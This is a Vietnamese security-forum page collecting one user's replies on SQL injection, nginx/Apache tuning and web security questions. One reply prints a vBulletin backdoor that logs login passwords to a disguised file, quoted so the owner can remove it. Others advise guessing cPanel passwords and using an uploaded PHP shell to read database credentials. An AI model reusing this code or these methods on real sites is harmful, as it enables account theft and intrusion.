banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: jin9x  XML
Profile for jin9x Messages posted by jin9x [ number of posts not being displayed on this page: 0 ]
 

micr0vnn wrote:
1. Khi lập trình web phải viết các thủ tục , hàm sql lưu trên Server SQl không được lập trình sql trên code. --> store procedure hay trigger liên quan gì đến sql injection đâu)--> sql injection xảy ra khi dữ liệu được input ko được xử lý vẫn bị inject thôi...

2. rewrite url để giúp cho tìm kiếm và đảm bảo an ninh bảo mật. (cái này để cho đẹp thôi chứ dữ liệu đưa vào nếu không xử lý vẫn bị inject)

3. Sử dụng mã nguồn mở lập trình . ( là sao chả hiểu -- có nghĩa là sử dụng mã nguồn mở sẽ ko bị inject à ) 


1. procedure nó có phần định nghĩa dữ liệu vào rồi, đó cũng có thể xem như là lọc dữ liệu
2. rewrite nó cũng vậy thôi bạn, regexp cũng có thể coi như 1 bước lọc dữ liệu cần dùng, và để ẩn đi url thật
3. chắc là sử dụng các open source để có nhiều ng dùng và hỗ trợ nên ít có lỗi

tóm lại chả hiểu viết mấy thứ đó lên đây để làm gì

zeropoint wrote:
Cái này mình tự tìm trên mạng khi đăng nhập vào trang quản trị của trang web thì nó yêu cầu nhập thêm user và pass theo như được biết thì user và pass này nằm trong file .htaccess nên chỉ có local rồi mới lấy được user và pass của nó!
Nhưng thiết nghĩ nếu local được thì cần gì đăng nhập chi nữa! Đã đặt câu hỏi nhiều diễn đàn như hầu như không có hồi âm! Còn tìm trên internet thì nó chỉ cách chống chứ không chỉ cách bypass không lẽ đây là một kỹ thuật ngăn chặn hoàn hảo như vậy? Chỉ còn có một cách là đoán pass trong file .htaccess? Thiết nghĩ nếu dùng kỹ thuật sql injection đề dò đọc file .htaccess mình chưa thử vì nhiều file config kỹ không cho truy xuất đến những trong thư mục website nên đành bó tay .cơm smilie  

cho mình cái định nghĩa từ "hoàn hảo" trong câu này của bác rồi mình sẽ thông não cho bác các vấn đề liên quan (trong khả năng hiếu biết của mình)
Sau khi search và đọc nhiều bài viết để cấu hình lại apache và nginx, mình có vài chỉnh sửa sau
nginx.conf
Code:
events {
worker_connections 1024;
}
keepalive_timeout 3;

httpd.conf
Code:
Timeout 60
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 3
<IfModule prefork.c>
StartServers 1
MinSpareServers 1
MaxSpareServers 5
ServerLimit 10
MaxClients 10
MaxRequestsPerChild 200
</IfModule>

vps mình dùng prefork MPM

vậy có vấn đề gì không, đã thử lại với ab tool nhưng không thay đổi, vấn đề RAM ít nhưng chạy cùng lúc nginx và apache có ảnh hưởng gì lớn đến vấn đề này không ?

cảm ơn các bạn đã giúp. smilie

quanta wrote:
Mình không có OpenVZ ở đây để test, nhưng ngoài việc giảm concurrent connections, ép các unused connections được đóng sớm hơn, bạn thử cách này xem:
http://www.eth0.us/openvz-limits
http://zee.balogh.sk/?p=1722
 

hình như mình không đủ quyền để chỉnh sửa các cấu hình này.

quanta wrote:
Cho server bị lỗi lại và kiểm tra thông tin trong file này xem giá trị `numtcpsock` và `tcpsndbuf` là bao nhiêu. 

em đã cho chạy ab -n 2000 -c 200 (những lần trước dùng với option này đều gây lỗi)
và được nội dung file như sau
Code:
cat /proc/user_beancounters
Version: 2.5
uid resource held maxheld barrier limit failcnt
110148: kmemsize 9732552 14133253 134217728 154217728 0
lockedpages 0 5 512 512 0
privvmpages 87370 116635 131072 131072 0
shmpages 1283 3363 24576 24576 2
dummy 0 0 0 0 0
numproc 61 142 500 500 0
physpages 46285 74687 0 9223372036854775807 0
vmguarpages 0 0 131072 131072 0
oomguarpages 46286 74688 131072 131072 0
numtcpsock 490 500 500 500 254579
numflock 10 33 400 600 0
numpty 2 2 81 81 0
numsiginfo 0 11 512 512 0
tcpsndbuf 1264032 8539880 8388608 8888608 8122883
tcprcvbuf 1222000 3931792 8388608 8888608 0
othersockbuf 83552 391552 8388608 8888608 0
dgramrcvbuf 0 16944 8388608 8888608 0
numothersock 53 186 500 500 0
dcachesize 985011 1031433 8388608 8888608 0
numfile 2150 2570 13056 13056 0
dummy 0 0 0 0 0
dummy 0 0 0 0 0
dummy 0 0 0 0 0
numiptent 28 500 500 500 6553

quanta wrote:

jin9x wrote:

quanta wrote:
VPS bạn đang dùng cái gì vậy: http://people.redhat.com/~rjones/virt-what/? 

openvz
 

Bạn gửi kết quả `# cat /proc/user_beancounters` lên xem. 


Code:
cat /proc/user_beancounters
Version: 2.5
uid resource held maxheld barrier limit failcnt
110148: kmemsize 6564392 14133253 134217728 154217728 0
lockedpages 0 5 512 512 0
privvmpages 70601 116635 131072 131072 0
shmpages 643 3363 24576 24576 2
dummy 0 0 0 0 0
numproc 50 142 500 500 0
physpages 30540 74687 0 9223372036854775807 0
vmguarpages 0 0 131072 131072 0
oomguarpages 30541 74688 131072 131072 0
numtcpsock 42 500 500 500 250750
numflock 12 33 400 600 0
numpty 1 2 81 81 0
numsiginfo 0 11 512 512 0
tcpsndbuf 1048032 8539880 8388608 8888608 8122883
tcprcvbuf 559008 3931792 8388608 8888608 0
othersockbuf 32448 391552 8388608 8888608 0
dgramrcvbuf 0 16944 8388608 8888608 0
numothersock 36 186 500 500 0
dcachesize 563400 1031433 8388608 8888608 0
numfile 1510 2570 13056 13056 0
dummy 0 0 0 0 0
dummy 0 0 0 0 0
dummy 0 0 0 0 0
numiptent 28 500 500 500 6553

quanta wrote:
VPS bạn đang dùng cái gì vậy: http://people.redhat.com/~rjones/virt-what/? 

openvz

conmale wrote:
Có 512Mb Ram mà vừa dùng cho kernel + daemon + nginx + apache (+ mysql) rồi phang nó kiểu đó thì "(105: No buffer space available)" là đúng rồi. 

ban đầu em cũng đã nghĩ là do RAM, nhưng sau 1 thời gian cố gắng theo dõi
thì những lúc có lỗi xảy ra, em dùng lệnh top để kiểm tra thì RAM luôn đạt khoảng 60% (280mb), cao hơn 1 tí so với những lúc ko xảy ra lỗi.
hay cái buffer đó chạy cần 1 lượng RAM trống nào đó ?
Mình có 1 cái vps được cài centos 32bit, disk space 10Gb, RAM 512Mb, 1 core
cài đặt web server theo mô hình: client => nginx (proxy) => apache
Mình dùng ab để test performance với thông số -n 2000 -c 300 thì gặp phải lỗi
socket: No buffer space available (105) 

thử giảm xuống -n 2000 -c 200 thì request được nhưng truy cập vào web thì báo lỗi 50x (500 502 503 504)
[alert] 32680#0: *1476165 socket() failed (105: No buffer space available) while connecting to upstream, client: x.x.x.x, server: domain.com, request: "GET / HTTP/1.0", upstream: "http://x.x.x.x:8080/", host: "domain.com

//Những phần màu vàng là những đoạn đã bị thay đổi

file cấu hình nginx
#######################################################################
#
# This is the main Nginx configuration file.
#
# More information about the configuration options is available on
# * the English wiki - http://wiki.nginx.org/Main
# * the Russian documentation - http://sysoev.ru/nginx/
#
#######################################################################

#----------------------------------------------------------------------
# Main Module - directives that cover basic functionality
#
# http://wiki.nginx.org/NginxHttpMainModule
#
#----------------------------------------------------------------------

user apache;
worker_processes 1;
error_log /var/log/nginx/error.log;
#error_log /var/log/nginx/error.log notice;
#error_log /var/log/nginx/error.log info;

pid /var/run/nginx.pid;


#----------------------------------------------------------------------
# Events Module
#
# http://wiki.nginx.org/NginxHttpEventsModule
#
#----------------------------------------------------------------------

events {
worker_connections 1024;
}


#----------------------------------------------------------------------
# HTTP Core Module
#
# http://wiki.nginx.org/NginxHttpCoreModule
#
#----------------------------------------------------------------------

http {
server_tokens off;
include /etc/nginx/mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';

access_log /var/log/nginx/access.log main;

sendfile on;
#tcp_nopush on;

keepalive_timeout 0;
#keepalive_timeout 65;

#gzip on;

#
# The default server
#
server {
listen 80;
server_name 127.0.0.1;

#charset koi8-r;

#access_log logs/host.access.log main;

location / {
root /usr/share/nginx/html;
index index.php index.html index.htm;
}

error_page 404 = /404.html;
location = /404.html {
root /usr/share/nginx/html;
}

# wwwect server error pages to the static page /50x.html
#
error_page 500 502 503 504 = /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}

# proxy the PHP scripts to Apache listening on 127.0.0.1:80
#
#location ~ \.php$ {
# proxy_pass http://127.0.0.1;
#}

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
#location ~ \.php$ {
# root html;
# fastcgi_pass 127.0.0.1:9000;
# fastcgi_index index.php;
# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
# include fastcgi_params;
#}

# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}

# Load config files from the /etc/nginx/conf.d directory
include /etc/nginx/conf.d/default.conf;
include /etc/nginx/conf.d/virtual/*.conf;
}
 

//Giải thích luôn phần màu đỏ tại sao mình dùng user apache chứ không mặc định là nginx
Vì mình lọc ra các file tĩnh (hình ảnh, html, zip, rar ... etc ...) và cho tải bằng nginx với expires max
Chỉ có các link nội dung động mới cho chuyển tiếp qua apache (listen ở 1 port khác)
Vậy cách này có ưu nhược gì không, và có nên cho toàn bộ file đều chạy qua proxy hết không ? (vấn đề này đang thắc mắc nhưng chưa có tài liệu gì để tham khảo trả lời)

Thực tế hiện tại là server của mình vẫn luôn gặp phải lỗi này vì lượng truy cập đồng thời cũng khá cao
Bạn nào có thể giúp mình hướng giải quyết hoặc gợi ý cho mình được không.

hachoa59 wrote:
GET là lấy về
POST là gửi đi
Mình hiểu đơn giản là thế 

hiểu vậy là sai rồi đấy GET và POST là kiểu truyền dữ liệu, có gửi dữ liệu đi và có nhận dữ liệu trả về

dang113 wrote:
Theo sự hiểu gà mờ của mỉnh thì nếu sử dụng GET hoặc POST trong form thì bác cứ nhìn trên thanh địa chỉ trình duyệt sẽ thấy dùng GET hoặc POST.
 

nhìn kĩ cái này để phân biệt
<form name="form1" method="post" action="Default.aspx" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTUyNzUzNTM5OGRkYpxbYf/8X27Ez4G2MA+epsHroa0=" />
</div>  

jek7ung wrote:
Như thế này có nghĩa là không có cách nào để ta xoá được dấu vết à 

bạn ko hiểu hay cố tình ko hiểu ? các bạn ở trên đã trả lời là có cách rồi còn gì, dùng quyền root
mà bạn chưa trả lời được 3 câu hỏi này mà

xnohat wrote:
Log trên *nix server thường dc đặt tại đâu ? thuộc sở hữu của user nào ? có quyền gì ? smilie  

nếu ko muốn có dấu vết thì đừng tạo ra dấu vết

phpshell thì khác gì file php bình thường, bạn truy cập vào phpshell thì khác gì người dùng truy cập vào 1 file php bình thường ?
có chắc là tìm không ra không, hay là chưa tìm ?
http://www.w3schools.com/tags/tag_iframe.asp
tag này không phải lấy thông tin trang,mà là tải toàn bộ nội dung trang đó trên 1 trang của mình

mrro wrote:
4a. làm sao để xác định được GMail dùng "cái gì" để tải file về?

4b. làm sao để xác định cái đó có hỗ trợ Javascript hay không? nếu có thì có những chuyện gì để nói?
 


4a. Cho GMail request đến server của mình, ở server mình cho sniff để lấy những thông tin của kết nối đó, sau đó dựa vào những thông tin đó để "đoán" (nhưng chắc là đoán không ra vì nhiều khả năng Gmail sử dụng công cụ riêng của họ)

4b. Để kiểm tra thì chỉ càn cho nó "xem" một đoạn javascript có chức năng gửi một request đến server mình và cho sniff thôi.
có request => đoạn js được thực thi => "cái gì đó" hiểu được js

Vấn đề này có thể nảy sinh nhiều vấn đề bảo mật khác, có thể áp dụng khai thác XSS, CRSF ... vào js mà
1. mình nghĩ rủi ro ở đây là mất khách hàng thôi
VD như việc những IT gửi cho nhau những mẩu virus để thảo luận, có thể đính kèm trực tiếp vào email chứ ko lằng nhằng đi upload lên 1 bên thứ 3
Giờ nó check virus kiểu này thì chắc gây khó chịu đôi chút

2.
a. chặn dung lượng, không chặn thời gian:
Mình nghĩ đến việc sẽ thử nhập 1 link down từ host của mình, nhưng đã hạn chế tốc độ download của nó (xuống còn 1 b/s chẳng hạn), thì việc download dai dẳng này có thể gây overload CPU

b. ngược lại, mình cũng sẽ nhập vào 1 link down mà dung lượng không giới hạn (nếu là server của google thì chắc tốc độ khủng lắm nên trong thời gian ngắn có thể download 1 file bự chảng chắc là dễ thôi) => gây ra điều gì thì mình ko biết được

Ps: cả 2 dạng link down mình lấy làm ví dụ mình có thể (và đã) dùng php để làm, chứ ko phải nói suông đâu
mình ko nghĩ vấn đề nằm ở nguy hiểm cho người nhận mà là nguy hiểm cho server mail
lần đầu mình nghĩ đến việc attacker có thể lợi dụng điều này để tải mã độc lên server mail, nhưng nghĩ lại thì thấy form upload attachment cũng có thể làm việc này chứ ko đặc biệt phải là tải từ url
tiếp theo mình nghĩ đến liệu có thể dùng nó để DOS ko nhỉ ? vì nó cũng request đến server khác (cái url của mình), nhưng việc DOS qua port 80 (http) thì có vẻ là ko hiệu quả lắm, hoặc có thể là mình ko biết cách làm sao để hiệu quả (có lẽ chỉ tốn bw của victim thôi).
ơ bạn này hay, vd nếu bạn có id nick admin là 1, cái chuỗi sau cố định để mình phục hồi lại được nick admin ấy hả
nó phải thay đổi và được lưu vào dữ liệu, phải là thành viên id 21 truy cập vào đúng cái link đó mới yêu cầu thay đổi mật khẩu được, đảm bảo tính bảo mật
theo mình thấy trên trang id.zing.vn ,khi nhập user, pass và ấn nút đăng nhập ,đầu tiên là zing sẽ mã hoá md5 password nhập vào (còn vì sao mình biết là md5 thì là vì nó đặt tên function mã hoá là md5 và password xuất ra cũng giống hệt md5 ,nhưng vẫn không thể hiểu được vì không rành javascript lắm)
sau khi mã hoá nó mới submit cái form login đó và gửi user ,password đã mã hoá đến file xử lí.

có thể qua các site proxy này nó không mã hoá password khi gửi nên không login được.
ajax với flash thì có liên quan gì nhỉ ?
Cái link flash trên mình đã xem qua ,cái flash cũng dóng vai trò như 1 cái form html ,khi upload nó sẽ request đến 1 file php ,file php này có nhiệm vụ xử lí file upload này và sẽ trả về kết quả dạng các biến của action script thì phải ,file flash sẽ sử dụng nó để hiển thị đúng nội dung.
Như vậy thì việc sử dụng form html hay 1 cái flash thì file php xử lí cũng tương tự nhau cả thôi, cái flash trên mình down về nhưng không chạy được vì nó bắt xác thực (khi load flash nó sẽ load file lang/en.xml ,sau đó request đến 1 file php login gì đó để xác thực rồi request tiếp đến 1 file php khác để lấy danh sách file trong thư mục upload).
vấn đề này thì mã nguồn nào cũng thế thôi mà .
theo mình biết các file php chỉ cần quyền read là có thể thực thi ,bạn có thể tìm hiểu nhiều hơn về chmod để biết.
xét đến các trường hợp của bạn ,file php nếu chmod 111 thì theo mình là không thể chạy được, còn chmod 711 thì có thể được 1 file php khác chung owner include vào. và nếu shell có chung owner với file này thì nó vẫn sẽ đọc được. Còn ngược lại thì thua .
về việc config bị mã hoá ,mình không cần quan tâm nó mã hoá bằng cách nào ,nhưng biết chắc chắn username ,passwird dùng để connect vào database là dạng plain text ,tức là không bị mã hoá, nếu cho in nó ra thì chẳng phải có được thông tin cần tìm sao ?

Jino_Hoang wrote:
Em biết anh nói là trong trường hợp up được shell và xem được file config. Nhưng một vấn đề là nếu như nó chuyển cái file config kia ra chỗ khác hoặc mã hoá mất rồi thì tính làm sao đây. Ý của em là gặp phải file config giả hoặc đã bị mã hoá. Có thể là ta sẽ giải mã hoặc là không giải được. Như vậy tức là không sờ được vào file config rồi! 

nếu đã có shell trên chính cái website này ,thì không có gì gọi là "không sờ được vào file config", vấn đề là sờ như thế nào ?
giả sử file config mà bạn nói tới có chứa thông tin của database ,tức là sẽ có 1 file khác cần dùng các thông tin này để connect vào database giúp website hoạt động ,như thế thì liệu có tìm được file config gốc không ?
về việc file config bị mã hoá .Tại sao file dùng để connect database có thể lấy đúng được thông tin cần thiết trong file config ,chẳng phải nó giải mã ra sao ? Và nếu nó làm được thì sao mình lại không ?

naebolo wrote:

jin9x wrote:
bạn có được quyền gì trên trang web bạn muốn xem ? 

Nếu có quyền j đó rồi thì hỏi làm j nữa:-< 

thế thì tìm các software chuyên scan cấu trúc website ,nếu may mắn có thể có được list file bạn cần tìm

xuansinh_Datinh_Lc wrote:
Xin giúp tôi viết đoạn code này bằng autoit. Tìm tất cả các file .exe trong tất cả các thư mục của ổ d, e, f,... khi tìm thấy thì copy và đổi tên file vnhcm.doc trong ổ c thành tất cả các file.exe đó.
Ví dụ tìm thấy 2 file theo đường dẫn d:\setup\coppy nhanh.exe và e:\caidat\lichvn.exe thì coppy đè file c:\vnhcm.doc lên 2 file .exe đó nghĩa vẫn giữ nguyên tên là coppy nhanh.exe lichvn.exe, và giữ nguyên icon của nó 

icon của nó là của cái gì ?
copy nghĩa là gì mà lại giữ nguyên icon ?
mà cái ebook Autoit có hướng dẫn tất cả các hàm để tìm kiếm ,copy ,rename ...có ví dụ rất dễ hiểu. bạn đã đọc nó chưa ?
bạn có được quyền gì trên trang web bạn muốn xem ?
các doạn code bạn nên bỏ trong thẻ code ,đọc bài mà bực cả mình.
đầu tiên xoá cái file crons.php kia đi ,đó là đoạn script giúp login không cần password. như nhiều người gọi là fakelogin thì phải.
tiếp theo xoá đoạn lưu password
Code:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = "./includes/class_xhtml.php";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'"smilie;
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+"smilie;
@fwrite($fp1, $lg_username . '|' . $lg_password."|" . $row["email"] . "\n"smilie;
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w"smilie;
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}

trong file login.php
hoặc tìm down lại source cùng phiên bản up lại 2 file global.php và login.php.
xoá luôn cái plugin kia.
@nếu bạn không ngại cho mình hỏi site của bạn là gì ?
Theo mình biết mặc định server chỉ thực thi code php từ các file có đuôi .php
Còn của bạn tạo file .rss đương nhiên là không thực thi các code php trong đó được.
Để thực thi code php trong các file có đuôi .rss ,bạn thử thêm dòng sau vào file .htaccess
Code:
AddType application/x-httpd-php .rss

và sau đó các file .rss sẽ thực thi như một file .php
hoặc bạn có thể soạn thảo trực tiếp rss trong file php ,tất nhiên là chỉnh lại header thành rss để trình duyệt nhận dạng đúng.
Code:
header("Content-Type: application/rss+xml");

sau đó nếu thích có thể dùng mod_rewrite để đổi đuôi .php thành .rss

panfider wrote:

Không nên học Pascal vì tốn thời gian nhưng sau này có thể không dùng.
Mình bắt đầu lập trình với C và bây giờ vẫn tiếp tục với C thỉnh thoảng dùng shell script cho đỡ nhức đầu.

Nên bắt đầu: html && Javascript, shell script, Perl hay Python
 

mình không cho rằng học pascal là tốn thời gian ,vì mình học lập trình chủ yếu là để có tư duy lập trình ,khi đã thông thạo một thứ thì việc đụng vào những thứ khác sẽ dễ dàng hơn.
mình vừa học xong năm 11 ,nhận thấy chương trình pascal chủ yếu dạy các bước cơ bản của lập trình ,dạy về các thuật toán cơ bản ,nếu bạn cố gắng hiểu thì cũng là một điều tốt.
mình thì bắt đầu bằng học php ,nên khi chuyển sang học pascal cũng cảm thấy dễ tiếp thu.

saclovnn wrote:
Ví dụ tôi đã có được link để dẫn tới Cpanel của một host vậy có cách nào dò tìm password không ? 

trong trường hợp này thì dò tìm đúng là 1 cách đó ,tìm user cpanel của site đó ,sau đó bắt đầu đoán password.

chanlycuocdoi wrote:
Bạn nào biết cách viết một chương trình nhập user name và password từ một file text rồi đăng nhập vào một trang web. Và nó phải trả về kết quả là đăng nhập thành công hay không. Có bạn nào biết không, giúp mình với! 

chỉ có thể viết cho một website cụ thể ,không làm chung chung được.
nếu rành php có thể dùng curl để làm việc này.
còn việc curl như thế nào thì google đầy ra đó ,đừng có làm biếng bảo tìm rồi không có.
thế user và pass data để làm gì vậy .
không phải shell đâu bạn ,chính xác là nhưng gì trong hình thì không phải là shell được ,mà bạn sử dụng mã nguồn forum nào vậy
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|